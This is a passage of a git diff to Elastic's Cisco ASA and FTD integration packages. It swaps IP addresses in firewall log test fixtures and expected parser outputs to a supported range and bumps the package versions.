inside:10.1.1.1/33340 (10.2.1.1/33340) to outsidet:192.168.2.223/80 (192.168.2.223/80), destination 192.168.2.223 resolved from dynamic list: 192.168.2.223/255.255.255.255, threat-level: very-high, category: Malware", "code": "338004", "kind": "event", "action": "firewall-rule", @@ -4724,7 +4724,7 @@ "destination_interface": "outsidet", "mapped_source_port": 33340, "threat_level": "very-high", - "mapped_destination_ip": "192.0.2.223", + "mapped_destination_ip": "192.168.2.223", "mapped_source_ip": "10.2.1.1", "rule_name": "dynamic", "source_interface": "inside", @@ -4739,8 +4739,8 @@ }, "destination": { "port": 80, - "address": "192.0.2.223", - "ip": "192.0.2.223" + "address": "192.168.2.223", + "ip": "192.168.2.223" }, "source": { "nat": { @@ -4780,13 +4780,13 @@ "ip": [ "10.1.1.1", "10.2.1.1", - "192.0.2.223" + "192.168.2.223" ] }, "event": { "severity": 4, - "ingested": "2021-10-06T20:55:38.565999100Z", - "original": "Jan 14 2015 13:16:14: %ASA-4-338008: Dynamic Filter dropped blacklisted TCP traffic from inside:10.1.1.1/33340 (10.2.1.1/33340) to outsidet:192.0.2.223/80 (192.0.2.223/80), destination 192.0.2.223 resolved from dynamic list: 192.0.2.223/255.255.255.255, threat-level: very-high, category: Malware", + "ingested": "2021-12-09T13:34:16.395409300Z", + "original": "Jan 14 2015 13:16:14: %ASA-4-338008: Dynamic Filter dropped blacklisted TCP traffic from inside:10.1.1.1/33340 (10.2.1.1/33340) to outsidet:192.168.2.223/80 (192.168.2.223/80), destination 192.168.2.223 resolved from dynamic list: 192.168.2.223/255.255.255.255, threat-level: very-high, category: Malware", "code": "338008", "kind": "event", "action": "firewall-rule", @@ -4804,7 +4804,7 @@ "destination_interface": "outsidet", "mapped_source_port": 33340, "threat_level": "very-high", - "mapped_destination_ip": "192.0.2.223", + "mapped_destination_ip": "192.168.2.223", "mapped_source_ip": "10.2.1.1", "rule_name": "dynamic", "source_interface": "inside", @@ -4818,8 +4818,8 @@ "level": "notification" }, "destination": { - "address": "192.0.2.1", - "ip": "192.0.2.1" + "address": "192.168.2.1", + "ip": "192.168.2.1" }, "source": { "address": "10.30.30.30", @@ -4844,13 +4844,13 @@ "related": { "ip": [ "10.30.30.30", - "192.0.2.1" + "192.168.2.1" ] }, "event": { "severity": 5, - "ingested": "2021-10-06T20:55:38.566002600Z", - "original": "Nov 16 2009 14:12:35: %ASA-5-304001: 10.30.30.30 Accessed URL 192.0.2.1:/app", + "ingested": "2021-12-09T13:34:16.395414600Z", + "original": "Nov 16 2009 14:12:35: %ASA-5-304001: 10.30.30.30 Accessed URL 192.168.2.1:/app", "code": "304001", "kind": "event", "action": "firewall-rule", @@ -4872,8 +4872,8 @@ "level": "notification" }, "destination": { - "address": "192.0.2.32", - "ip": "192.0.2.32" + "address": "192.168.2.32", + "ip": "192.168.2.32" }, "source": { "address": "10.5.111.32", @@ -4900,13 +4900,13 @@ "related": { "ip": [ "10.5.111.32", - "192.0.2.32" + "192.168.2.32" ] }, "event": { "severity": 5, - "ingested": "2021-10-06T20:55:38.566007700Z", - "original": "Nov 16 2009 14:12:36: %ASA-5-304001: 10.5.111.32 Accessed URL 192.0.2.32:http://example.com", + "ingested": "2021-12-09T13:34:16.395419700Z", + "original": "Nov 16 2009 14:12:36: %ASA-5-304001: 10.5.111.32 Accessed URL 192.168.2.32:http://example.com", "code": "304001", "kind": "event", "action": "firewall-rule", @@ -4928,8 +4928,8 @@ "level": "notification" }, "destination": { - "address": "192.0.0.19", - "ip": "192.0.0.19" + "address": "192.168.0.19", + "ip": "192.168.0.19" }, "source": { "address": "10.69.6.39", @@ -4962,13 +4962,13 @@ "related": { "ip": [ "10.69.6.39", - "192.0.0.19" + "192.168.0.19" ] }, "event": { "severity": 5, - "ingested": "2021-10-06T20:55:38.566013400Z", - "original": "Nov 16 2009 14:12:37: %ASA-5-304002: Access denied URL http://www.example.net/images/favicon.ico SRC 10.69.6.39 DEST 192.0.0.19 on interface inside", + "ingested": "2021-12-09T13:34:16.395424200Z", + "original": "Nov 16 2009 14:12:37: %ASA-5-304002: Access denied URL http://www.example.net/images/favicon.ico SRC 10.69.6.39 DEST 192.168.0.19 on interface inside", "code": "304002", "kind": "event", "action": "firewall-rule", @@ -4994,26 +4994,32 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "RU-MOW", - "city_name": "Moscow", - "country_iso_code": "RU", - "country_name": "Russia", - "region_name": "Moscow", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": 37.6172, - "lat": 55.7527 + "lon": -1.3614, + "lat": 51.7095 } }, - "address": "1.2.3.4", + "as": { + "number": 20712, + "organization": { + "name": "Andrews \u0026 Arnold Ltd" + } + }, + "address": "81.2.69.144", "port": 80, "user": { "name": "username" }, - "ip": "1.2.3.4" + "ip": "81.2.69.144" }, "source": { "nat": { - "ip": "1.2.3.4" + "ip": "81.2.69.144" }, "address": "10.2.3.4", "port": 49926, @@ -5052,13 +5058,13 @@ ], "ip": [ "10.2.3.4", - "1.2.3.4" + "81.2.69.144" ] }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:38.566019900Z", - "original": "Jan 13 2021 19:12:37: %ASA-6-302013: Built inbound TCP connection 27215708 for internet:10.2.3.4/49926 (1.2.3.4/49926)(LOCAL\\username) to vlan-42:1.2.3.4/80 (1.2.3.4/80) (username)", + "ingested": "2021-12-09T13:34:16.395429600Z", + "original": "Jan 13 2021 19:12:37: %ASA-6-302013: Built inbound TCP connection 27215708 for internet:10.2.3.4/49926 (81.2.69.144/49926)(LOCAL\\username) to vlan-42:81.2.69.144/80 (81.2.69.144/80) (username)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -5073,8 +5079,8 @@ "asa": { "destination_interface": "vlan-42", "mapped_source_port": 49926, - "mapped_destination_ip": "1.2.3.4", - "mapped_source_ip": "1.2.3.4", + "mapped_destination_ip": "81.2.69.144", + "mapped_source_ip": "81.2.69.144", "connection_id": "27215708", "source_interface": "internet", "mapped_destination_port": 80, diff --git a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-sip.log b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-sip.log index aaed86dc2e6..71da467bcd5 100644 --- a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-sip.log +++ b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-sip.log @@ -1,4 +1,4 @@ Oct 20 2019 15:42:54: %ASA-6-607001: Pre-allocate SIP Via UDP secondary channel for vrf53204:10.13.170.13/5060 to ACI-App_VRF:172.16.90.3 from OPTIONS message Jun 08 2020 12:59:57: %ASA-6-607001: Pre-allocate SIP SIGNALLING UDP secondary channel for vrf53204:10.18.133.23/5060 to ACI-App_VRF:172.16.74.3 from OPTIONS message Aug 6 2020 11:01:37: %ASA-6-607001: Pre-allocate SIP NOTIFY UDP secondary channel for vrf52304:10.18.170.54/5060 to ACI-App_VRF:172.16.72.5 from 200 message -Aug 6 2020 11:01:38: %ASA-6-607001: Pre-allocate SIP Via UDP secondary channel for vrf52304:10.13.133.64/5060 to ACI-App_VRF:172.15.72.3 from REGISTER message +Aug 6 2020 11:01:38: %ASA-6-607001: Pre-allocate SIP Via UDP secondary channel for vrf52304:10.13.133.64/5060 to ACI-App_VRF:67.43.156.12 from REGISTER message diff --git a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-sip.log-expected.json b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-sip.log-expected.json index d2189658289..68ceea4834c 100644 --- a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-sip.log-expected.json +++ b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-sip.log-expected.json @@ -47,7 +47,7 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:47.622586Z", + "ingested": "2021-12-09T13:34:24.465484300Z", "original": "Oct 20 2019 15:42:54: %ASA-6-607001: Pre-allocate SIP Via UDP secondary channel for vrf53204:10.13.170.13/5060 to ACI-App_VRF:172.16.90.3 from OPTIONS message", "code": "607001", "kind": "event", @@ -115,7 +115,7 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:47.622597Z", + "ingested": "2021-12-09T13:34:24.465492800Z", "original": "Jun 08 2020 12:59:57: %ASA-6-607001: Pre-allocate SIP SIGNALLING UDP secondary channel for vrf53204:10.18.133.23/5060 to ACI-App_VRF:172.16.74.3 from OPTIONS message", "code": "607001", "kind": "event", @@ -183,7 +183,7 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:47.622604500Z", + "ingested": "2021-12-09T13:34:24.465498400Z", "original": "Aug 6 2020 11:01:37: %ASA-6-607001: Pre-allocate SIP NOTIFY UDP secondary channel for vrf52304:10.18.170.54/5060 to ACI-App_VRF:172.16.72.5 from 200 message", "code": "607001", "kind": "event", @@ -214,26 +214,8 @@ "ip": "10.13.133.64" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-CA", - "city_name": "Los Angeles", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "California", - "location": { - "lon": -118.2946, - "lat": 34.1004 - } - }, - "as": { - "number": 7018, - "organization": { - "name": "AT\u0026T Services, Inc." - } - }, - "address": "172.15.72.3", - "ip": "172.15.72.3" + "address": "67.43.156.12", + "ip": "67.43.156.12" }, "tags": [ "preserve_original_event" @@ -263,14 +245,14 @@ }, "related": { "ip": [ - "172.15.72.3", + "67.43.156.12", "10.13.133.64" ] }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:47.622611500Z", - "original": "Aug 6 2020 11:01:38: %ASA-6-607001: Pre-allocate SIP Via UDP secondary channel for vrf52304:10.13.133.64/5060 to ACI-App_VRF:172.15.72.3 from REGISTER message", + "ingested": "2021-12-09T13:34:24.465503900Z", + "original": "Aug 6 2020 11:01:38: %ASA-6-607001: Pre-allocate SIP Via UDP secondary channel for vrf52304:10.13.133.64/5060 to ACI-App_VRF:67.43.156.12 from REGISTER message", "code": "607001", "kind": "event", "action": "firewall-rule", diff --git a/packages/cisco_asa/manifest.yml b/packages/cisco_asa/manifest.yml index 173a90c4c16..efaab5d515e 100644 --- a/packages/cisco_asa/manifest.yml +++ b/packages/cisco_asa/manifest.yml @@ -1,7 +1,7 @@ format_version: 1.0.0 name: cisco_asa title: Cisco ASA -version: 1.3.0 +version: 1.3.1 license: basic description: Collect logs from Cisco ASA with Elastic Agent. type: integration diff --git a/packages/cisco_ftd/_dev/deploy/docker/sample_logs/cisco-ftd.log b/packages/cisco_ftd/_dev/deploy/docker/sample_logs/cisco-ftd.log index ad5d5f9ee28..c7b2a67bc4e 100644 --- a/packages/cisco_ftd/_dev/deploy/docker/sample_logs/cisco-ftd.log +++ b/packages/cisco_ftd/_dev/deploy/docker/sample_logs/cisco-ftd.log @@ -1 +1 @@ -2019-08-16T09:39:03Z firepower %FTD-1-430005: SrcIP: 10.0.1.20, DstIP: 213.211.198.62, SrcPort: 46004, DstPort: 80, Protocol: tcp, FileDirection: Download, FileAction: Malware Cloud Lookup, FileSHA256: 2546dcffc5ad854d4ddc64fbf056871cd5a00f2471cb7a5bfd4ac23b6e9eedad, SHA_Disposition: Unavailable, SperoDisposition: Spero detection not performed on file, ThreatName: Win.Ransomware.Eicar::95.sbx.tg, FileName: eicar_com.zip, FileType: ZIP, FileSize: 184, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-16T09:39:02Z, FilePolicy: malware-and-file-policy, FileStorageStatus: Not Stored (Disposition Was Pending), FileSandboxStatus: File Size Is Too Small, URI: http://www.eicar.org/download/eicar_com.zip +2019-08-16T09:39:03Z firepower %FTD-1-430005: SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 46004, DstPort: 80, Protocol: tcp, FileDirection: Download, FileAction: Malware Cloud Lookup, FileSHA256: 2546dcffc5ad854d4ddc64fbf056871cd5a00f2471cb7a5bfd4ac23b6e9eedad, SHA_Disposition: Unavailable, SperoDisposition: Spero detection not performed on file, ThreatName: Win.Ransomware.Eicar::95.sbx.tg, FileName: eicar_com.zip, FileType: ZIP, FileSize: 184, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-16T09:39:02Z, FilePolicy: malware-and-file-policy, FileStorageStatus: Not Stored (Disposition Was Pending), FileSandboxStatus: File Size Is Too Small, URI: http://www.eicar.org/download/eicar_com.zip diff --git a/packages/cisco_ftd/changelog.yml b/packages/cisco_ftd/changelog.yml index b554b95416c..08468950ca6 100644 --- a/packages/cisco_ftd/changelog.yml +++ b/packages/cisco_ftd/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.2.1" + changes: + - description: Change test public IPs to the supported subset + type: bugfix + link: https://github.com/elastic/integrations/pull/2327 - version: "1.2.0" changes: - description: Add 8.0.0 version constraint diff --git a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-asa-fix.log-expected.json b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-asa-fix.log-expected.json index 61405e96a15..d6d4c3719df 100644 --- a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-asa-fix.log-expected.json +++ b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-asa-fix.log-expected.json @@ -57,7 +57,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-09-07T12:21:32.148637500Z", + "ingested": "2021-12-09T13:34:27.491792100Z", "original": "Apr 17 2020 14:08:08 SNL-ASA-VPN-A01 : %ASA-6-302016: Teardown UDP connection 110577675 for Outside:10.123.123.123/53723(LOCAL\\Elastic) to Inside:10.233.123.123/53 duration 0:00:00 bytes 148 (zzzzzz)", "code": "302016", "kind": "event", @@ -134,7 +134,7 @@ }, "event": { "severity": 4, - "ingested": "2021-09-07T12:21:32.148665100Z", + "ingested": "2021-12-09T13:34:27.491797700Z", "original": "Apr 17 2020 14:00:31 SNL-ASA-VPN-A01 : %ASA-4-106023: Deny icmp src Inside:10.123.123.123 dst Outside:10.123.123.123 (type 11, code 0) by access-group \"Inside_access_in\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -203,7 +203,7 @@ }, "event": { "severity": 4, - "ingested": "2021-09-07T12:21:32.148702200Z", + "ingested": "2021-12-09T13:34:27.491802700Z", "original": "Apr 15 2013 09:36:50: %ASA-4-106023: Deny tcp src dmz:10.123.123.123/6316 dst outside:10.123.123.123/53 type 3, code 0, by access-group \"acl_dmz\" [0xe3afb522, 0x0]", "code": "106023", "kind": "event", @@ -279,7 +279,7 @@ }, "event": { "severity": 4, - "ingested": "2021-09-07T12:21:32.148710300Z", + "ingested": "2021-12-09T13:34:27.491808700Z", "original": "Apr 17 2020 14:16:20 SNL-ASA-VPN-A01 : %ASA-4-106023: Deny udp src Inside:10.123.123.123/57621(LOCAL\\Elastic) dst Outside:10.123.123.123/57621 by access-group \"Inside_access_in\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -340,7 +340,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-07T12:21:32.148716500Z", + "ingested": "2021-12-09T13:34:27.491831500Z", "original": "Apr 17 2020 14:15:07 SNL-ASA-VPN-A01 : %ASA-2-106017: Deny IP due to Land Attack from 10.123.123.123 to 10.123.123.123", "code": "106017", "kind": "event", diff --git a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-asa.log b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-asa.log index 9f0a0b8b598..5d21ffa5a9f 100644 --- a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-asa.log +++ b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-asa.log @@ -1,268 +1,268 @@ -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1772 to outside:100.66.98.44/8256 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11757 for outside:100.66.205.104/80 (100.66.205.104/80) to inside:172.31.98.44/1772 (172.31.98.44/1772) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11749 for outside:100.66.211.242/80 to inside:172.31.98.44/1758 duration 0:01:07 bytes 38110 TCP Reset-I -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11748 for outside:100.66.211.242/80 to inside:172.31.98.44/1757 duration 0:01:07 bytes 44010 TCP Reset-I -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11745 for outside:100.66.185.90/80 to inside:172.31.98.44/1755 duration 0:01:07 bytes 7652 TCP Reset-I -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11744 for outside:100.66.185.90/80 to inside:172.31.98.44/1754 duration 0:01:07 bytes 7062 TCP Reset-I -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11742 for outside:100.66.160.197/80 to inside:172.31.98.44/1752 duration 0:01:08 bytes 5738 TCP Reset-I -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11738 for outside:100.66.205.14/80 to inside:172.31.98.44/1749 duration 0:01:08 bytes 4176 TCP Reset-I -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11739 for outside:100.66.124.33/80 to inside:172.31.98.44/1750 duration 0:01:08 bytes 1715 TCP Reset-I -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11731 for outside:100.66.35.9/80 to inside:172.31.98.44/1747 duration 0:01:09 bytes 45595 TCP Reset-I -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11723 for outside:100.66.211.242/80 to inside:172.31.98.44/1742 duration 0:01:09 bytes 27359 TCP Reset-I -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11715 for outside:100.66.218.21/80 to inside:172.31.98.44/1741 duration 0:01:09 bytes 4457 TCP Reset-I -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11711 for outside:100.66.198.27/80 to inside:172.31.98.44/1739 duration 0:01:09 bytes 26709 TCP Reset-I -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11712 for outside:100.66.198.27/80 to inside:172.31.98.44/1740 duration 0:01:09 bytes 22097 TCP Reset-I -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11708 for outside:100.66.202.211/80 to inside:172.31.98.44/1738 duration 0:01:10 bytes 2209 TCP Reset-I -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11746 for outside:100.66.124.15/80 to inside:172.31.98.44/1756 duration 0:01:07 bytes 10404 TCP Reset-I -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11706 for outside:100.66.124.15/80 to inside:172.31.98.44/1737 duration 0:01:10 bytes 123694 TCP Reset-I -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11702 for outside:100.66.209.247/80 to inside:172.31.98.44/1736 duration 0:01:11 bytes 35835 TCP Reset-I -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11753 for outside:100.66.35.162/80 to inside:172.31.98.44/1765 duration 0:00:30 bytes 0 SYN Timeout -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:100.66.98.44/1188 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11758 for outside:100.66.80.32/53 (100.66.80.32/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11758 for outside:100.66.80.32/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 148 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11759 for outside:100.66.252.6/53 (100.66.252.6/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11759 for outside:100.66.252.6/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 164 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1773 to outside:100.66.98.44/8257 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11760 for outside:100.66.252.226/80 (100.66.252.226/80) to inside:172.31.98.44/1773 (172.31.98.44/1773) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1774 to outside:100.66.98.44/8258 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11761 for outside:100.66.252.226/80 (100.66.252.226/80) to inside:172.31.98.44/1774 (172.31.98.44/1774) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11762 for outside:100.66.238.126/53 (100.66.238.126/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11763 for outside:100.66.93.51/53 (100.66.93.51/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11762 for outside:100.66.238.126/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 111 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11763 for outside:100.66.93.51/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 237 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1775 to outside:100.66.98.44/8259 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11764 for outside:100.66.225.103/443 (100.66.225.103/443) to inside:172.31.98.44/1775 (172.31.98.44/1775) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:100.66.98.44/1189 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11772 for outside:100.66.240.126/53 (100.66.240.126/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11773 for outside:100.66.44.45/53 (100.66.44.45/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11772 for outside:100.66.240.126/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 87 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11773 for outside:100.66.44.45/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 221 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1452 to outside:100.66.98.44/8265 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11774 for outside:100.66.179.219/80 (100.66.179.219/80) to inside:172.31.98.44/1452 (172.31.98.44/1452) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11775 for outside:100.66.157.232/53 (100.66.157.232/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11776 for outside:100.66.178.133/53 (100.66.178.133/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11775 for outside:100.66.157.232/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 101 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11776 for outside:100.66.178.133/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 126 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1453 to outside:100.66.98.44/8266 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11777 for outside:100.66.133.112/80 (100.66.133.112/80) to inside:172.31.98.44/1453 (172.31.98.44/1453) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11777 for outside:100.66.133.112/80 to inside:172.31.98.44/1453 duration 0:00:00 bytes 862 TCP FINs -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11779 for outside:100.66.204.197/53 (100.66.204.197/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11778 for outside:100.66.157.232/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11779 for outside:100.66.204.197/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 176 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1454 to outside:100.66.98.44/8267 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11780 for outside:100.66.128.3/80 (100.66.128.3/80) to inside:172.31.98.44/1454 (172.31.98.44/1454) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1455 to outside:100.66.98.44/8268 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11781 for outside:100.66.128.3/80 (100.66.128.3/80) to inside:172.31.98.44/1455 (172.31.98.44/1455) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1456 to outside:100.66.98.44/8269 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11782 for outside:100.66.128.3/80 (100.66.128.3/80) to inside:172.31.98.44/1456 (172.31.98.44/1456) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11783 for outside:100.66.100.4/53 (100.66.100.4/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11783 for outside:100.66.100.4/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1457 to outside:100.66.98.44/8270 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11784 for outside:100.66.198.40/80 (100.66.198.40/80) to inside:172.31.98.44/1457 (172.31.98.44/1457) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1458 to outside:100.66.98.44/8271 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11785 for outside:100.66.198.40/80 (100.66.198.40/80) to inside:172.31.98.44/1458 (172.31.98.44/1458) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11786 for outside:100.66.1.107/53 (100.66.1.107/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11784 for outside:100.66.198.40/80 to inside:172.31.98.44/1457 duration 0:00:00 bytes 593 TCP FINs -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1459 to outside:100.66.98.44/8272 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11787 for outside:100.66.198.40/80 (100.66.198.40/80) to inside:172.31.98.44/1459 (172.31.98.44/1459) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11786 for outside:100.66.1.107/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 375 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1460 to outside:100.66.98.44/8273 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11788 for outside:100.66.192.44/80 (100.66.192.44/80) to inside:172.31.98.44/1460 (172.31.98.44/1460) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1454 to outside:100.66.98.44/8267 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.156.80/1385 to outside:100.66.98.44/8277 -Oct 10 2018 12:34:56 localhost 